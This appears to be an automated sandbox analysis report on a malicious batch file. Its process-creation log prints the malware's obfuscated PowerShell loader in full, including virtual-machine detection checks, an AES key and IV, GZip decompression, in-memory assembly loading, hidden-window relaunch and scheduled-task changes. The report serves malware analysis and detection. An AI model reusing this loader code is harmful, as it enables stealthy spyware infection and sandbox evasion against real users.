Source: C:\Windows\System32\winlogon.exe	Code function: 39_3_00000225DC61CC94	39_3_00000225DC61CC94
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64DA18	39_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC642FF0	39_2_00000225DC642FF0
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64D894	39_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67DA18	39_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC672FF0	39_2_00000225DC672FF0
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67D894	39_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exe	Code function: 40_3_00000202C0ABCE18	40_3_00000202C0ABCE18
Source: C:\Windows\System32\lsass.exe	Code function: 40_3_00000202C0ABCC94	40_3_00000202C0ABCC94
Source: C:\Windows\System32\lsass.exe	Code function: 40_3_00000202C0AB23F0	40_3_00000202C0AB23F0
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AEDA18	40_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AED894	40_2_00000202C0AED894
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AE2FF0	40_2_00000202C0AE2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 41_3_000002A6612DCE18	41_3_000002A6612DCE18
Source: C:\Windows\System32\svchost.exe	Code function: 41_3_000002A6612D23F0	41_3_000002A6612D23F0
Source: C:\Windows\System32\svchost.exe	Code function: 41_3_000002A6612DCC94	41_3_000002A6612DCC94
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130DA18	41_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A661302FF0	41_2_000002A661302FF0
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130D894	41_2_000002A66130D894
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAEDBCE18	42_3_000002BAAEDBCE18
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAEDB23F0	42_3_000002BAAEDB23F0
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAEDBCC94	42_3_000002BAAEDBCC94
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAED8CE18	42_3_000002BAAED8CE18
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAED823F0	42_3_000002BAAED823F0
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAED8CC94	42_3_000002BAAED8CC94
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCDA18	42_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDC2FF0	42_2_000002BAAEDC2FF0
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCD894	42_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4DA18	42_2_000002BAAEE4DA18
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE42FF0	42_2_000002BAAEE42FF0
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4D894	42_2_000002BAAEE4D894
Source: C:\Windows\System32\svchost.exe	Code function: 43_3_0000026A8799CC94	43_3_0000026A8799CC94
Source: C:\Windows\System32\svchost.exe	Code function: 43_3_0000026A879923F0	43_3_0000026A879923F0
Source: C:\Windows\System32\svchost.exe	Code function: 43_3_0000026A8799CE18	43_3_0000026A8799CE18
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CD894	43_2_0000026A879CD894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879C2FF0	43_2_0000026A879C2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CDA18	43_2_0000026A879CDA18
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4D894	43_2_0000026A87F4D894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F42FF0	43_2_0000026A87F42FF0
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4DA18	43_2_0000026A87F4DA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_3_000001795377CE18	44_3_000001795377CE18
Source: C:\Windows\System32\svchost.exe	Code function: 44_3_000001795377CC94	44_3_000001795377CC94
Source: C:\Windows\System32\svchost.exe	Code function: 44_3_00000179537723F0	44_3_00000179537723F0
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537ADA18	44_2_00000179537ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537AD894	44_2_00000179537AD894
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537A2FF0	44_2_00000179537A2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DDA18	44_2_00000179537DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DD894	44_2_00000179537DD894
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537D2FF0	44_2_00000179537D2FF0
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_3_0000016CE5E2CC94	45_3_0000016CE5E2CC94
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_3_0000016CE5E223F0	45_3_0000016CE5E223F0
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_3_0000016CE5E2CE18	45_3_0000016CE5E2CE18
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653DA18	45_2_0000016CE653DA18
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE6532FF0	45_2_0000016CE6532FF0
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653D894	45_2_0000016CE653D894
Source: C:\Windows\System32\svchost.exe	Code function: 46_3_000002295D53CE18	46_3_000002295D53CE18
Source: C:\Windows\System32\svchost.exe	Code function: 46_3_000002295D53CC94	46_3_000002295D53CC94
Source: C:\Windows\System32\svchost.exe	Code function: 46_3_000002295D5323F0	46_3_000002295D5323F0
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56DA18	46_2_000002295D56DA18
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56D894	46_2_000002295D56D894
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D562FF0	46_2_000002295D562FF0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2674
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2682
Source: unknown	Process created: Commandline size = 5344
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2674	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2682	Jump to behavior

Source: Process Memory Space: powershell.exe PID: 1284, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4828, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.dr	Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.50.dr	Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr	Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}d
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr	Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.dr	Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.50.dr	Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.50.dr	Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr	Binary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.50.dr	Binary string: C:\Device\HarddiskVolume3`
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr	Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.50.dr	Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr	Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr	Binary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr	Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: System.evtx.50.dr	Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.50.dr	Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.dr	Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.50.dr	Binary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr	Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}l
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr	Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr	Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.dr	Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}

Source: classification engine

Classification label: mal100.spyw.evad.winCMD@55/94@1/1

Source: C:\Windows\System32\dllhost.exe

Code function: 38_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,

38_2_0000000140002D4C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 35_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,

35_2_004011AD

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 35_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,

35_2_004017A5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20241004

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3760:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\2820930
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3732:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\4817770
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2756:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4828
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1284
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\6260321

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_squa0cl3.qra.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1.cmd

Virustotal: Detection: 14%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4828 -s 2096
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4828 -s 2380
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NM